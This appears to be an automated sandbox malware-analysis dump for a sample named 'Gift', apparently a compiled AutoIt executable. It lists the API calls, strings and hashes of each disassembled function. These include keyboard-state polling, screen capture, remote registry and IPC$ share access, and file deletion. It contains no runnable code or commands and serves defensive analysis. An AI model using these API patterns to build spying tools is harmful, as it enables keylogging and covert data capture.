                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 844e19378344915e14b83be9c56bdb7cfb8b746788bae797fccf2da2ccc7f354
                                                                          • Instruction ID: e7ccb1f66c9e66bcd7bf618d8932cf7110be5bfcf402c47277dd3de3c1d758ab
                                                                          • Opcode Fuzzy Hash: 844e19378344915e14b83be9c56bdb7cfb8b746788bae797fccf2da2ccc7f354
                                                                          • Instruction Fuzzy Hash: 746179B1901229EFDF16DFA0ED49EEEBB79FF04300F048569F915A6290DB719A05CB60
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 00347A79
                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00347A85
                                                                          • CreateCompatibleDC.GDI32(?), ref: 00347A91
                                                                          • SelectObject.GDI32(00000000,?), ref: 00347A9E
                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00347AF2
                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00347B2E
                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00347B52
                                                                          • SelectObject.GDI32(00000006,?), ref: 00347B5A
                                                                          • DeleteObject.GDI32(?), ref: 00347B63
                                                                          • DeleteDC.GDI32(00000006), ref: 00347B6A
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00347B75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                          • String ID: (
                                                                          APIs
                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0033A4D4
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0033A4F6
                                                                          • __swprintf.LIBCMT ref: 0033A54F
                                                                          • __swprintf.LIBCMT ref: 0033A568
                                                                          • _wprintf.LIBCMT ref: 0033A61E
                                                                          • _wprintf.LIBCMT ref: 0033A63C
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          APIs
                                                                            • Part of subcall function 0033951A: __time64.LIBCMT ref: 00339524
                                                                            • Part of subcall function 002E4A8C: _fseek.LIBCMT ref: 002E4AA4
                                                                          • __wsplitpath.LIBCMT ref: 003397EF
                                                                            • Part of subcall function 002F431E: __wsplitpath_helper.LIBCMT ref: 002F435E
                                                                          • _wcscpy.LIBCMT ref: 00339802
                                                                          • _wcscat.LIBCMT ref: 00339815
                                                                          • __wsplitpath.LIBCMT ref: 0033983A
                                                                          • _wcscat.LIBCMT ref: 00339850
                                                                          • _wcscat.LIBCMT ref: 00339863
                                                                            • Part of subcall function 00339560: _memmove.LIBCMT ref: 00339599
                                                                            • Part of subcall function 00339560: _memmove.LIBCMT ref: 003395A8
                                                                          • _wcscmp.LIBCMT ref: 003397AA
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DE1
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DF4
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00339A0D
                                                                          • _wcsncpy.LIBCMT ref: 00339A80
                                                                          • DeleteFileW.KERNEL32(?,?), ref: 00339AB6
                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00339ACC
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00339ADD
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00339AEF
                                                                          Similarity
                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E5BF1
                                                                          • GetMenuItemCount.USER32(00397890), ref: 00320E7B
                                                                          • GetMenuItemCount.USER32(00397890), ref: 00320F2B
                                                                          • GetCursorPos.USER32(?), ref: 00320F6F
                                                                          • SetForegroundWindow.USER32(00000000), ref: 00320F78
                                                                          • TrackPopupMenuEx.USER32(00397890,00000000,?,00000000,00000000,00000000), ref: 00320F8B
                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00320F97
                                                                          Similarity
                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                          • String ID:
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,00360980), ref: 0033AF4E
                                                                          • GetDriveTypeW.KERNEL32(00000061,0038B5F0,00000061), ref: 0033B018
                                                                          • _wcscpy.LIBCMT ref: 0033B042
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                          • String ID: L,6$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • _memset.LIBCMT ref: 00328489
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003284BE
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003284DA
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003284F6
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00328520
                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00328548
                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00328553
                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00328558
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                            • Part of subcall function 002E153B: _memmove.LIBCMT ref: 002E15C4
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003358EB
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00335901
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00335912
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00335924
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00335935
                                                                          Similarity
                                                                          • API ID: SendString$_memmove
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00335535
                                                                            • Part of subcall function 002F0859: timeGetTime.WINMM(?,00000002,002DC22C), ref: 002F085D
                                                                          • Sleep.KERNEL32(0000000A), ref: 00335561
                                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00335585
                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003355A7
                                                                          • SetActiveWindow.USER32 ref: 003355C6
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003355D4
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003355F3
                                                                          • Sleep.KERNEL32(000000FA), ref: 003355FE
                                                                          • IsWindow.USER32 ref: 0033560A
                                                                          • EndDialog.USER32(00000000), ref: 0033561B
                                                                          Similarity
                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1194449130-3405671355
                                                                          • Opcode ID: e4b5a19146aa10e9c277417e1e84c1cff9824c90c7e5ce92d3688db6bc9e9cd1
                                                                          • Instruction ID: 8cd8199b978afbdafa937b9af0ca24ccf9a7a356f4ac01869d9db5226905c148
                                                                          • Opcode Fuzzy Hash: e4b5a19146aa10e9c277417e1e84c1cff9824c90c7e5ce92d3688db6bc9e9cd1
                                                                          • Instruction Fuzzy Hash: 9D216D70208645AFE7475F60ECCAA273B6EEB87345F02641AF502811B1DFF2DD549A72
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • CoInitialize.OLE32(00000000), ref: 0033DC2D
                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0033DCC0
                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0033DCD4
                                                                          • CoCreateInstance.OLE32(00363D4C,00000000,00000001,0038B86C,?), ref: 0033DD20
                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0033DD8F
                                                                          • CoTaskMemFree.OLE32(?,?), ref: 0033DDE7
                                                                          • _memset.LIBCMT ref: 0033DE24
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0033DE60
                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0033DE83
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0033DE8A
                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0033DEC1
                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0033DEC3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                          • String ID:
                                                                          • API String ID: 1246142700-0
                                                                          • Opcode ID: bc7d0a956b89e92fe7be47b522f93e17b5e2ee46585e82e1f26206113a1243cd
                                                                          • Instruction ID: cb8fefa928e87c69e392c4efcf66c37a49e6c8d227e3543bfe4c3e016cebc538
                                                                          • Opcode Fuzzy Hash: bc7d0a956b89e92fe7be47b522f93e17b5e2ee46585e82e1f26206113a1243cd
                                                                          • Instruction Fuzzy Hash: E2B1F875A10119AFDB05DFA4D889DAEBBB9FF48304F1084A9E905EB261DB70EE41CF50
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00330896
                                                                          • SetKeyboardState.USER32(?), ref: 00330901
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00330921
                                                                          • GetKeyState.USER32(000000A0), ref: 00330938
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00330967
                                                                          • GetKeyState.USER32(000000A1), ref: 00330978
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 003309A4
                                                                          • GetKeyState.USER32(00000011), ref: 003309B2
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 003309DB
                                                                          • GetKeyState.USER32(00000012), ref: 003309E9
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00330A12
                                                                          • GetKeyState.USER32(0000005B), ref: 00330A20
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 7940d39d9e86dd16ce87c682ef3574e48d4a1cf35ae0c04bfd4c45730d677027
                                                                          • Instruction ID: baaaadcb0d028c207c3a251f23927573dd79103e3fdc511fcf694d479103f889
                                                                          • Opcode Fuzzy Hash: 7940d39d9e86dd16ce87c682ef3574e48d4a1cf35ae0c04bfd4c45730d677027
                                                                          • Instruction Fuzzy Hash: 8C51CD3090478819FB3ADBB184A57EABFB49F01780F09459DD5C25F5C3DBA49A4CCB91
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 0032CE1C
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0032CE2E
                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0032CE8C
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0032CE97
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0032CEA9
                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0032CEFD
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0032CF0B
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0032CF1C
                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0032CF5F
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0032CF6D
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0032CF8A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0032CF97
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 81b3a1c6086a70a67b3ea2166ced5414cf296dfe6306adcc2c4c6423ffd3a252
                                                                          • Instruction ID: f60fac9053e753de598a3068ff549c6093067348e0bc07e3138cc41ee4958172
                                                                          • Opcode Fuzzy Hash: 81b3a1c6086a70a67b3ea2166ced5414cf296dfe6306adcc2c4c6423ffd3a252
                                                                          • Instruction Fuzzy Hash: AD517371B10205BFDF19CF68DD86AAEBBBAEB88711F14812DF516D7290D7B0AD008B50
                                                                          APIs
                                                                            • Part of subcall function 002D29AB: GetWindowLongW.USER32(?,000000EB), ref: 002D29BC
                                                                          • GetSysColor.USER32(0000000F), ref: 002D25AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ColorLongWindow
                                                                          • String ID:
                                                                          • API String ID: 259745315-0
                                                                          • Opcode ID: 33926ae83d50427bd2e370f75b7d151af69e3cbc313dd996ed0b78c6e5091f97
                                                                          • Instruction ID: 9a73987a715353be1330ef23a68c623bdeff68e8bef67966039ef6f47693e5c4
                                                                          • Opcode Fuzzy Hash: 33926ae83d50427bd2e370f75b7d151af69e3cbc313dd996ed0b78c6e5091f97
                                                                          • Instruction Fuzzy Hash: A041E430014244EFDB265F28D889BB93769EB26331F1942A2FD668A2E1D7708C55DB61
                                                                          APIs
                                                                            • Part of subcall function 002F0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002E2A3E,?,00008000), ref: 002F0BA7
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002E2ADF
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002E2C2C
                                                                            • Part of subcall function 002E3EBE: _wcscpy.LIBCMT ref: 002E3EF6
                                                                            • Part of subcall function 002F386D: _iswctype.LIBCMT ref: 002F3875
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                          • API String ID: 537147316-3738523708
                                                                          • Opcode ID: c6daf24babfca33876bf1dbd9abfd0a52be1224c4a63b2629ca229651e5d2c5e
                                                                          • Instruction ID: 798dbe91b3ee96cd4fa2873b5d9e504cdc15382245fe196f5763b54715ac9d6a
                                                                          • Opcode Fuzzy Hash: c6daf24babfca33876bf1dbd9abfd0a52be1224c4a63b2629ca229651e5d2c5e
                                                                          • Instruction Fuzzy Hash: 8302D330058381DFC725EF21C891AAFBBE5AF89344F50492DF49A972A2DB30D959CF52
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __i64tow__itow__swprintf
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 421087845-2263619337
                                                                          • Opcode ID: 2e8df9ca3cdcd86851634561ede05646d8a5f48ea2066e0dd3370cfc9502f336
                                                                          • Instruction ID: f176ec9a8a89a073651e08e864829f47ff4895ed789cdd0b0e7e4866627fd0cd
                                                                          • Opcode Fuzzy Hash: 2e8df9ca3cdcd86851634561ede05646d8a5f48ea2066e0dd3370cfc9502f336
                                                                          • Instruction Fuzzy Hash: 1A41D171624209AFDB25EF78D842E7AB3E9EB45340F20446EE249D7392EA719D61CB10
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0035778F
                                                                          • CreateMenu.USER32 ref: 003577AA
                                                                          • SetMenu.USER32(?,00000000), ref: 003577B9
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00357846
                                                                          • IsMenu.USER32(?), ref: 0035785C
                                                                          • CreatePopupMenu.USER32 ref: 00357866
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00357893
                                                                          • DrawMenuBar.USER32 ref: 0035789B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                          • String ID: 0$F
                                                                          • API String ID: 176399719-3044882817
                                                                          • Opcode ID: 73e5865118be7c5d46929d0f9187a711593fd148c72a2698556b046c8541d1df
                                                                          • Instruction ID: 0c2a5ee5832655a75c2d6664657be8d00b6c4530f868ec8ed66767b5b9b97e13
                                                                          • Opcode Fuzzy Hash: 73e5865118be7c5d46929d0f9187a711593fd148c72a2698556b046c8541d1df
                                                                          • Instruction Fuzzy Hash: F7416A74A04209EFDB12DF64E889EAABBB9FF49311F194029FD06A7360C771A914CF50
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00357B83
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00357B8A
                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00357B9D
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00357BA5
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00357BB0
                                                                          • DeleteDC.GDI32(00000000), ref: 00357BB9
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00357BC3
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00357BD7
                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00357BE3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                          • String ID: static
                                                                          • API String ID: 2559357485-2160076837
                                                                          • Opcode ID: eb1dface0282057addb385be52a038b53d1a4fc1274de4f414434f5a1e9683b3
                                                                          • Instruction ID: ec25ac7b9dec829d625e172c890d98b900b1e3a02c670eedab85604ee691e7bb
                                                                          • Opcode Fuzzy Hash: eb1dface0282057addb385be52a038b53d1a4fc1274de4f414434f5a1e9683b3
                                                                          • Instruction Fuzzy Hash: 1D318832104219ABDF179FA4DC4AFDB3B6EFF09321F114215FA16A61A0C7B1D824DBA4
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002F706B
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          • __gmtime64_s.LIBCMT ref: 002F7104
                                                                          • __gmtime64_s.LIBCMT ref: 002F713A
                                                                          • __gmtime64_s.LIBCMT ref: 002F7157
                                                                          • __allrem.LIBCMT ref: 002F71AD
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F71C9
                                                                          • __allrem.LIBCMT ref: 002F71E0
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F71FE
                                                                          • __allrem.LIBCMT ref: 002F7215
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002F7233
                                                                          • __invoke_watson.LIBCMT ref: 002F72A4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                          • String ID:
                                                                          • API String ID: 384356119-0
                                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
